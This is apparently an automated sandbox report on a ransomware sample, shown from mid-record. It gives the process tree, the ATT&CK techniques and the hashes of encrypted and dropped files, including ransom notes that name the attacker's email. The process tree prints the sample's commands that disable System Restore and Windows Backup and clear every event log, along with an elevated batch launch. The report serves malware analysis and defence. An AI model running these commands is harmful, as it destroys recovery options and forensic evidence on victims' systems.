reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore /v DisableSR /t REG_DWORD /d 1 /f
3⤵
PID:1388

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
2⤵
PID:1700

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
3⤵
PID:1600

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
2⤵
PID:852

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
3⤵
PID:788

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
2⤵
PID:1476

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
3⤵
PID:1888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
2⤵
PID:1912

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
3⤵
PID:1872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
2⤵
PID:1508

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
3⤵
PID:656

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
2⤵
PID:1896

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
3⤵
PID:1264

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
2⤵
PID:868

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
3⤵
PID:620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
2⤵
PID:1340

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
3⤵
PID:592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
2⤵
PID:1984

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
3⤵
PID:1936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
2⤵
PID:1212

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
3⤵
PID:208

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
2⤵
PID:220

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
3⤵
PID:232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
2⤵
PID:1028

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
3⤵
PID:736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer /v DisableMSI /t REG_DWORD /d 1 /f
2⤵
PID:740

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer /v DisableMSI /t REG_DWORD /d 1 /f
3⤵
PID:1472

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
2⤵
PID:1256

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
3⤵
PID:1468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c for / F "tokens=*" %%s in('wevtutil.exe el') DO wevtutil.exe cl "%%s"
2⤵
PID:1444

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start XinofSetup.bat
2⤵
PID:1792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K XinofSetup.bat
3⤵
PID:1680

C:\Windows\system32\PING.EXE
ping localhost.com -n 1
4⤵
- Runs ping.exe
PID:1524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Powershell Start XinofSetup.bat -Verb Runas
2⤵
PID:1436

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell Start XinofSetup.bat -Verb Runas
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1672

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\XinofSetup.bat"
4⤵
PID:1476

C:\Windows\system32\PING.EXE
ping localhost.com -n 1
5⤵
- Runs ping.exe
PID:904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "How To Decrypt Files.hta"
2⤵
PID:612

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\How To Decrypt Files.hta"
3⤵
- Modifies Internet Explorer settings
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:812

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1228 -s 1400
1⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:316

C:\Windows\Explorer.EXE
"C:\Windows\Explorer.EXE"
2⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1156

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1040

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Deletion

T1107

Modify Registry

T1112

File Permissions Modification

T1222

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5
ed777d6bf2f684da1f71bdf0416a0d0b

SHA1
ab063f4f66c16b45733ce8970a7dd0092bdc5aa1

SHA256
845195c056090e889523d78541c05b45e3b955609320575bf12fec1d609802cc

SHA512
116ff58e11ab0832ec37528fa258252cf10b683a9def4d613e89995f05930caac3b07527f6f2568696c8d030207296f9c3603cb41fe84b323235a859d504327e

Download Submit
C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5
656bdccc20db3f839533b85bc65a6988

SHA1
d89780ab6609f2b2ec78a39ba202ea406f386438

SHA256
6379b61717c683b70462ce36bd2cf23bd5d8a7997e4526c422ac349c527b3acf

SHA512
93f1865d87c5654b5864219549a9b0172f12754ca197c9d66603f045f7b1018bcfdf4a0670a04546e0708873e0d06069442f9da1f4548ab51ed49899592a25d2

Download Submit
C:\ProgramData\SystemID
MD5
e0e278def32f4826b7b73356857940ef

SHA1
a08798fe621b7a1b1add98693d9c32acedf00ad7

SHA256
1177767437d1fb1878fe187fdfb9edd617d9e4027adb2d96b5f04669680584e7

SHA512
08c7b74c4cbbf5ec7bac039f407735c48446f685bc539a297c534f134c73347e33982d0741e9b7f6111aee88ff4aa93948af50c0f0950706aa61c7827f70fe37

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cpriv.key
MD5
a02686eda834b2bf10beb7bde11bee5b

SHA1
1172e76fcc6628d80fda1ce84641dbc557f2a314

SHA256
a493df2e095ef8334998b2ac782872d3fb86d41bad48708055684f82745a1b35

SHA512
928ef05587071368428589a6d35fe4304b9f8c9845cd9ab24fa9d60f4b175d14aacd78965bea11520ae611b85a59df80751063a142ac2860a04304125f4d1496

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cpub.key
MD5
17c81203ef0e18628d6e497a5681c76d

SHA1
b0274ec1d0bc98b735959e958044d933360ec2e6

SHA256
dc8cb15f68761b3b7e5409bef47c426ae36b4798d4a44dd7ba983e5a321a7f06

SHA512
a60216417fe807ec25f72aea03424452be89fa9b02c0ad742faeaae7fa37b84155bc256d93694082fa6f780875476df4bde8aa4de08ceb3a80e06070f8083606

Download Submit
C:\Users\Admin\AppData\Local\Temp\FXSAPIDebugLogFile.txt
MD5
03b43bfddb48c9b8fbb8910c582f2428

SHA1
7efd598b42dfa8ca174e04a1f5c879e9e7a78190

SHA256
789712583a510f2c46b8fb1f7b0ec52d55d0d68b5849466f9f42680e0af2bed5

SHA512
76958a8d05654064ec10a3431e1581f1f61c694f6a0984edb26b21bcb7cbc60023887df4ac48ef9c33a6c844f4264e44c1b60fc85b7b34e86ba4d1b92538df73

Download Submit
C:\Users\Admin\AppData\Local\Temp\How To Decrypt Files.hta
MD5
f8de7da291b7fac4053eff9ba8b68ef0

SHA1
47f2550dd4ebc56f167e1335ff5ec2f9100f863c

SHA256
95e7ee01826ac22110c8966c634d772037ec25b1fd7c8a01bf1cf48dc154e998

SHA512
0e759a54c9396a94ecacffdcec1b98f4f4264b815d0306f5f20d2e7c7cd7fac52e0f6c78d237da5c15fb1bcc4aa11cf18ff8f9a94c4adaf70811f0d9daf19e53

Download Submit
C:\Users\Admin\AppData\Local\Temp\SystemID
MD5
e0e278def32f4826b7b73356857940ef

SHA1
a08798fe621b7a1b1add98693d9c32acedf00ad7

SHA256
1177767437d1fb1878fe187fdfb9edd617d9e4027adb2d96b5f04669680584e7

SHA512
08c7b74c4cbbf5ec7bac039f407735c48446f685bc539a297c534f134c73347e33982d0741e9b7f6111aee88ff4aa93948af50c0f0950706aa61c7827f70fe37

Download Submit
C:\Users\Admin\AppData\Local\Temp\WPDNSE\Cpriv.key
MD5
a02686eda834b2bf10beb7bde11bee5b

SHA1
1172e76fcc6628d80fda1ce84641dbc557f2a314

SHA256
a493df2e095ef8334998b2ac782872d3fb86d41bad48708055684f82745a1b35

SHA512
928ef05587071368428589a6d35fe4304b9f8c9845cd9ab24fa9d60f4b175d14aacd78965bea11520ae611b85a59df80751063a142ac2860a04304125f4d1496

Download Submit
C:\Users\Admin\AppData\Local\Temp\WPDNSE\Help.txt
MD5
c7199085c9ebf2e72ad6c5df57edf185

SHA1
ea7c6b15b2fee5ef95658ad68d62624741c9b7ef

SHA256
83a3ac21cfcc6069d0e4f01acb3d528ab80cec04e87e5106ef571fe8d8872636

SHA512
057730155bfdb9d46bc60f68a22c6a88594fe43a8be455c719f1ccafcf790a89f5bf1ff1e9c22db19c89ef23fd31843f1e5f1d67e7aa54c262f3d65cc8a8c5c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\WPDNSE\How To Decrypt Files.hta
MD5
f8de7da291b7fac4053eff9ba8b68ef0

SHA1
47f2550dd4ebc56f167e1335ff5ec2f9100f863c

SHA256
95e7ee01826ac22110c8966c634d772037ec25b1fd7c8a01bf1cf48dc154e998

SHA512
0e759a54c9396a94ecacffdcec1b98f4f4264b815d0306f5f20d2e7c7cd7fac52e0f6c78d237da5c15fb1bcc4aa11cf18ff8f9a94c4adaf70811f0d9daf19e53

Download Submit
C:\Users\Admin\AppData\Local\Temp\XinofSetup.bat
MD5
e87b92b6fa7ff1c853199790b082024d

SHA1
63fe98f296ca56bd39c21fe1fce61586cfaf78a2

SHA256
ede85eb58f52473dafe94d6911d56c4d3a23ead97753359941bd8413995fa6c5

SHA512
3b51a2cceed74e8a111c473c5153220169b4fd8d17f6767b471f9b0d7cb09e6d111567bbf666ad22a28ddb62dd2b4ef28c25781dbcf0a7e1b75a36e6bbeef634

Download Submit
C:\Users\Admin\Desktop\CompareUnpublish.wma.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5
a012cd308847fd7aa09afe8a3ec5fbab

SHA1
aacc8ffcf664e62c22837b6712b9c3c9aa76a906

SHA256
c8e95421b72ad5dc835d3b7fbe959181416d6e895c2dfa9e4381352f7f5f3384

SHA512
3c90d9411c9edf585b102e16edf02294083384dd86c17252fefca0c6a573b72b9334c94a9966018d828ef55ddd944413440c20a2ecc0c0a596252a3d2c395049

Download Submit
C:\Users\Admin\Desktop\Cpriv.key
MD5
a02686eda834b2bf10beb7bde11bee5b

SHA1
1172e76fcc6628d80fda1ce84641dbc557f2a314

SHA256
a493df2e095ef8334998b2ac782872d3fb86d41bad48708055684f82745a1b35

SHA512
928ef05587071368428589a6d35fe4304b9f8c9845cd9ab24fa9d60f4b175d14aacd78965bea11520ae611b85a59df80751063a142ac2860a04304125f4d1496

Download Submit
C:\Users\Admin\Desktop\DisconnectAdd.ttc.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5
688085a04d564714efc6281cdbaf76de

SHA1
c75fcfb3072e928e1669bf2d84a0e2a931970e43

SHA256
a08b3457be49a375514958c84ee6cd08704afe85051642098f8af94a37f70176

SHA512
4c102ececded3e951024d19cbe94e61c18c4c3a6edee72079ab4d0d2ed43c9c264ea9458ce47c2f56592af5b66e7de2a591ee46e87f5d29d30bbff3b75a2e157

Download Submit
C:\Users\Admin\Desktop\DisconnectStep.csv.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5
8b8f0c341c3bb9448548558a3608d537

SHA1
32c867e6b903447c5460e8110322b7eff5b3425c

SHA256
18d40c4de860f248b781b70ae48897870fce434d7e0d40b50737b6f77b025704

SHA512
ea2fb27080c49e48abe7e17a1186d9bfd9320317e2f0af91666750e1cb9b3e6a958b0edf5399bbf72974d332e50509571f35d7ff78b4424138b42b6593d36e99

Download Submit
C:\Users\Admin\Desktop\ExpandResume.clr.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5
756d2ba7f8c462340fa9ab1e4c9085bf

SHA1
c99aace2f8d248a495943a0992fee762c79e32e0

SHA256
41576cbe60aa0e5a9a21434d1f670288ca9dcae211dbec2f8a9985e037234dff

SHA512
7ba4b54ca4f9806e2f2d3b56f8cfec16eb84d66477fabc1394a564d6ae650af5f84306dc2b21b1c2a219f206f21de9b4e5f13195121c2e09b8d45853de24482a

Download Submit
C:\Users\Admin\Desktop\ExpandSearch.vsx.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5
86cccdc9a9a405e35bc2c3a6401c9f0d

SHA1
b530f88eff5f35f112c5990c7d58e498776dbcfc

SHA256
c5884e02c3e52ed03e7aa6dd634eb3808f75ad6adf2231cf4ddb8067de5069d7

SHA512
96c277da99631c4d129039b841b64d747235c3f33ff62da28eee952ed029e552325ca46ad43f528e7b75705eb9174bfce1a19e91abf0561f1054fcced25d7318

Download Submit
C:\Users\Admin\Desktop\GroupOpen.vsd.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5
4c5534d39a6112c25cbde1d72106eecc

SHA1
0ee889eb6c776d64b663835188688868051167de

SHA256
74a4ed4dd1ae1f7938a73cf79e05cd47799f81b36652c81ebeb340764d019c76

SHA512
ed39d57302ed0c5a79613201dd65bafa88568f39983caac974e3c2021c998413dc3f4e6d8b5e8f5803f1a65d1059c4b5702fa329be66144ee407471a434c1f3b

Download Submit
C:\Users\Admin\Desktop\Help.txt
MD5
c7199085c9ebf2e72ad6c5df57edf185

SHA1
ea7c6b15b2fee5ef95658ad68d62624741c9b7ef

SHA256
83a3ac21cfcc6069d0e4f01acb3d528ab80cec04e87e5106ef571fe8d8872636

SHA512
057730155bfdb9d46bc60f68a22c6a88594fe43a8be455c719f1ccafcf790a89f5bf1ff1e9c22db19c89ef23fd31843f1e5f1d67e7aa54c262f3d65cc8a8c5c9

Download Submit
C:\Users\Admin\Desktop\How To Decrypt Files.hta
MD5
f8de7da291b7fac4053eff9ba8b68ef0

SHA1
47f2550dd4ebc56f167e1335ff5ec2f9100f863c

SHA256
95e7ee01826ac22110c8966c634d772037ec25b1fd7c8a01bf1cf48dc154e998

SHA512
0e759a54c9396a94ecacffdcec1b98f4f4264b815d0306f5f20d2e7c7cd7fac52e0f6c78d237da5c15fb1bcc4aa11cf18ff8f9a94c4adaf70811f0d9daf19e53

Download Submit
C:\Users\Admin\Desktop\JoinPing.css.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5
b47773e65359d3d65b9b8d562492ed1b

SHA1
079b9f7021b03ca4bd90e944fe5cb1a0bc19e1b0

SHA256
4a6b9157f0938c4919fe4d6f207a1f89551c9a8d4cf2df575a4436549ae30c60

SHA512
59cba896ebd23c69fbf47662f857c2d26872a195cbba3b4ed94a2200565bb2db6ef9f8696e3151ff81703e26dbea624a8144027f984553b160eb2d87fd2756cf

Download Submit
C:\Users\Admin\Desktop\LockEdit.reg.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5
c482f5912b956d3ae8d8d99e8782be90

SHA1
91fbf5c7dfc93f9be2e5d3cd18209fe8d9c13e9c

SHA256
024ff162a3442fec9899ae3aac985a199711a3aaa648aca74b8356ef7f5cb16e

SHA512
787abc61d2b78bc03041c3dce564a6dfdf2420ffb46425a20dfbcbcee897fbfb322d5641dafee01ddb8e44f88e3c9b71253abfee3029ccee3375120ca73ea7fb

Download Submit
C:\Users\Admin\Desktop\MeasureAdd.raw.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5
02dfe570774e015d104b1d6692ceee87

SHA1
f4a374d9b49b3d96f8544b73be815696eed81b66

SHA256
e7c2afdcb7b432014eae7a1d0cd7640de8ed337a93ed0a50d220bb478b71ceef

SHA512
69128ff98549b0e620cb271556130e4241ca8a3e439ff0409615911ef725e7880cb800d167e3dc3671689639a2da3f2384126691a3d976a072ad9a3d4182a647

Download Submit
C:\Users\Admin\Desktop\MeasureDisconnect.wmv.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5
4666789d048657e21f78cc3250a31fea

SHA1
f2f5da9bfc4ee3fee3bc5d5b969f5e6e4b749ad0

SHA256
59bb17c27ff72e32eb0ed1e20bcbfea1a48c456f619cb8a8f15191c4af958a55

SHA512
2f6cc9caaf8478e851e113b01a0046f90f566ab4d4991087f1555db5791f217b08ee854b446ece320d1a24d0d815e6546665cc20fe2987548c5d5bac3a27903a

Download Submit
C:\Users\Admin\Desktop\MergeDeny.vb.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5
2a080598ad9875ae1a34c4fd97f49838

SHA1
9831f03acd8d8b3ea4842ffcb0c59188f1a55da7

SHA256
7b520e701bb87c76c9a69837fd98dfce5f6d76c5e0fd88b8c28ec52b4eed6978

SHA512
3e5f8aeca6dbfd898d62bbdb6163a8c4a23fbeae96c47159a6424ab6451be45b4307b337be7f20b3d2713814b8e9c18ca5906028af6c26767201444802b4ee98

Download Submit
C:\Users\Admin\Desktop\MountApprove.mp4.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5
7a75e9d18126d883216bd49ac253af48

SHA1
49dd7909e1570d156a97d4bda8f099b48a5391b5

SHA256
aae4985ea2fcaed80852d9b3a4b6f8e4b7d811b607097efbf5ff0f2488cf6e52

SHA512
afdd0619063f53da4051437ba2ec7ac9f8e8c142f8686229acac93b93bf609fce34009e94a4d08465034baf2fd1ab1fc9ca420fe5151478ed96fa1591ef61fe7

Download Submit
C:\Users\Admin\Desktop\MoveStop.js.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5
f408acde990ce3beeeed2da8f9c2ae27

SHA1
192d61a49acdb5927f1dcac97a802d3cb682f1ca

SHA256
1cbdbe8806a2018f65d9318840b76179a1b406e29cc041834678e221be712f02

SHA512
5ac81198b04a71387eaa86c8ef88020137b0412c60a8f9ab62394622687e7e3c264c57da009506752e831c1cfc69664e35e04f1382a61fdb1a31c68c3b478407

Download Submit
C:\Users\Admin\Desktop\ProtectApprove.3gp2.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5
99f27d3913fda7de72277099eef727b3

SHA1
6295184382e9c28df30c1d7fcd0c5cbb20000cff

SHA256
6011c82ee49c8f35a2c76b4bff0f06197fb6d559929c1d963840897da21997db

SHA512
96e0f3c4b1afc4277e8c577c051a22e553962967498fe9d2721f442ef6ed1016325cff45c47a71629692f1715998d7aa89db4768a97eac3e82dd93f7530e429e

Download Submit
C:\Users\Admin\Desktop\RepairGrant.pptm.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5
1439602f8050817c48d30452fed669ac

SHA1
b512e349bd8e56f218d51b3b3b362fedd4940c1f

SHA256
cf1f2eb0a5d668260f415546cf2a042697da5335d09a2ab34f377a00ddfdd432

SHA512
89c283ee1540349d5459a22288c09215289e00855d8606ebe16a39617698adf31c81a480987780ef9d93475ca64beaeb87699173f6f96e7378eb8305fe6a16e1

Download Submit
C:\Users\Admin\Desktop\ResetAdd.mpv2.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5
a27b86c0f9080f73966e9d7c74b77b62

SHA1
c00215a3886db6fd6a9d47c64187ebe34931465f

SHA256
c06b29da6e7f26719d04746ebc284d257119833d0eb3c5c89f39885aec5ac635

SHA512
13fd06f6cb0ef1766e556e80be4754175c6b0dd7b52ddd16fa5cbf4bc34312a17cceb819f698dcf227d75af3053791918f75a1c02726659d8d67f4ec2ba3b816

Download Submit
C:\Users\Admin\Desktop\ResetMeasure.3g2.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5
bcb5a742503a0c6a367ce0dbf3f6f318

SHA1
f74d633602c9f4903f05f572095b8c0e8403b64a

SHA256
adaf00e92a1e2d6fdcc4f635b69818f3375fbb9f1b257feed29d3db83b5fb8b3

SHA512
b129aa8a9c99756be9dc30754ee378931b9d488d3aed6cec0c87f74e8e1799d3729d275978a754bae645e18244152c032647a3ce7b685c94655038ac0f78b091

Download Submit
C:\Users\Admin\Desktop\RevokeUnlock.mpg.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5
a04495f9bb81d37ee9a00f5b68d90209

SHA1
2607e698fbd5d63114abd5833b51e4e0af3bb17b

SHA256
618d2ff1aa8fb429bf5e1b00c1df12fe5ef1c3842c7fd01fe9396ea505235dd3

SHA512
219ecb403230adebbf437171e684633c6b9720664a5a2e7d6731aea736761794c79a3c089fd386120176cc1ec2fea2733651105544e4f3fcfa073fc93f121d55

Download Submit
C:\Users\Admin\Desktop\ShowUnprotect.contact.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5
17cfd7e1d30289bd1ca9664415841316

SHA1
7331dbc587508ffe025679ba021da09fe9c99789

SHA256
2da64e07f49d53d722c9cdd6c95869e65e110324f6e88261c8a7e9300bac08b3

SHA512
7fd9799ebde7e93e9ab08370e883feae78b2605ced89adbccc256454a9ceab87c00959914359b2b856ece555ee7402e53e264ba35b374062edfe8cf87092ad1a

Download Submit
C:\Users\Admin\Desktop\StartSelect.exe.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5
a1e472741b494bac5ffa034b6f5a3116

SHA1
842c65869d676c860762976d7b733cbbac8423f8

SHA256
0fd02cd2062297a48edaca62cb42de18e3a0d5237245c836157ddb476f9051e1

SHA512
11bf7f5ab37fe32200f114ac5b77ccbdf3230571ced4d617e206a903f2754a15ba822c0ec15b2e43cdb0a271ab9f8a8e7a97a8aa117ee2c2e28c6928631376da

Download Submit
C:\Users\Admin\Desktop\SubmitPublish.raw.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5
00c3632b2aef1f6d7d66e69519b37197

SHA1
9a79164cdb8a403645b7ba3e491c6609dfd95ecb

SHA256
2f8f122628a04221fb4afdcf62081de2b57b89c386b5f2404bc7b4a2f4bd7339

SHA512
a289567b649b6e312005dad84db0298452ec31a3df474f898e56f3ad42d7723d69bd27c0971e3362f25402f0a172b390a2c2033bfb782ea8e01444c1315e7c6e

Download Submit
C:\Users\Admin\Desktop\SubmitRepair.nfo.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5
e188995a877bfcb3d3b59c3dc1da9823

SHA1
cb102250ef0692b269e44eaa283bc49ce4aabd38

SHA256
7ce5e21c21fd24a064761e7f11c4ec0e58bef0baf064b52eaf3145f027317994

SHA512
f49133d4570595f400397e52715d32bd02981a2980ec9c55e1b616aa0ed1aa3d7d31eae61c1be6bbdd18bdec225282e82cdfcbbfea7acac3b8eac958c0ba8812

Download Submit
C:\Users\Public\Desktop\Adobe Reader 9.lnk.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5
915edd10651240864f54b493e5f5880c

SHA1
e53d857d71b3814dfd31ac7caf71547d88e81f94

SHA256
02c6d916e42b1cc6ae04ab02374f59eaf063c83194b6058931e1ac82161c9dcd

SHA512
049b747deddbd55cc19cf953e277a316444f917dcc06fde56d33838c3266d22f8af4c8924fc0cdb3dd760f9e1d5f67c55e9dde9c69aa5c1c085e49a7992d9e72

Download Submit
C:\Users\Public\Desktop\Cpriv.key
MD5
a02686eda834b2bf10beb7bde11bee5b

SHA1
1172e76fcc6628d80fda1ce84641dbc557f2a314

SHA256
a493df2e095ef8334998b2ac782872d3fb86d41bad48708055684f82745a1b35

SHA512
928ef05587071368428589a6d35fe4304b9f8c9845cd9ab24fa9d60f4b175d14aacd78965bea11520ae611b85a59df80751063a142ac2860a04304125f4d1496

Download Submit
C:\Users\Public\Desktop\Firefox.lnk.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5
834a21dac3a51b0f192a6614f625c3af

SHA1
2a1e00815376b2d79ac2e480f5c4fd1c94ecb7e5

SHA256
74a23f87bdb64bd9d1c06a262c0db7921a395bdf7f7d129134464764a068399f

SHA512
6777ffec58ffb1915af3f3a24e6b8696b641d52e0295c02dfae443ab86f861f40ef17e107ae0de59e927564ad64c749259b25394ceec493cfbcc9d05e482cdf1

Download Submit
C:\Users\Public\Desktop\Google Chrome.lnk.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5
04ad26376bd169a6243a05ed1782c16b

SHA1
065046d56efcf5c1964b47c4eb4309a8b085e336

SHA256
5956eda2ef20925375e48f7f4546333ee5ba4ea33402e82cfebda1fc54ae3b63

SHA512
8c23c3c6899521bb6e3cc2ba6592a24d9510e49a6ee0df80771edc944988272f1e4288b6d5a9c2dadfa1f9a693d65ad9db7c455c46990b2621172be3f03f93c3

Download Submit
C:\Users\Public\Desktop\Help.txt
MD5
c7199085c9ebf2e72ad6c5df57edf185

SHA1
ea7c6b15b2fee5ef95658ad68d62624741c9b7ef

SHA256
83a3ac21cfcc6069d0e4f01acb3d528ab80cec04e87e5106ef571fe8d8872636

SHA512
